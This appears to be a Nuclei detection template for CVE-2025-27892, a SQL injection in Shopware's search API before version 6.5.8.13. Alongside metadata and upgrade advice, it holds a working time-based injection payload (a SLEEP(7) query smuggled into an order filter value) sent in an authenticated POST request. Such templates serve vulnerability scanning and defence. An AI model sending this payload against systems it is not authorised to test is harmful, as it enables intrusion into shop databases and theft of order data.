id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field in this "aggregations" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through the aggregations parameter in the search API, potentially extracting sensitive data from the Shopware database.
  remediation: |
    Upgrade to Shopware version 6.5.8.13 or later that properly sanitizes the aggregations parameter.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    epss-score: 0.01246
    epss-percentile: 0.79619
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? --",
                "field": "amountTotal"
              }
            }
          ]
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4a0a00473045022100eaac329f54d102825c051ed31521ec54f6683b720481c6b29ff13e540bde660e022076b721b75c4b7e5074a699d75567c7624a651a546e8003af4ed8d0b3a2b016a3:922c64590222798bb761d5b6d8e72950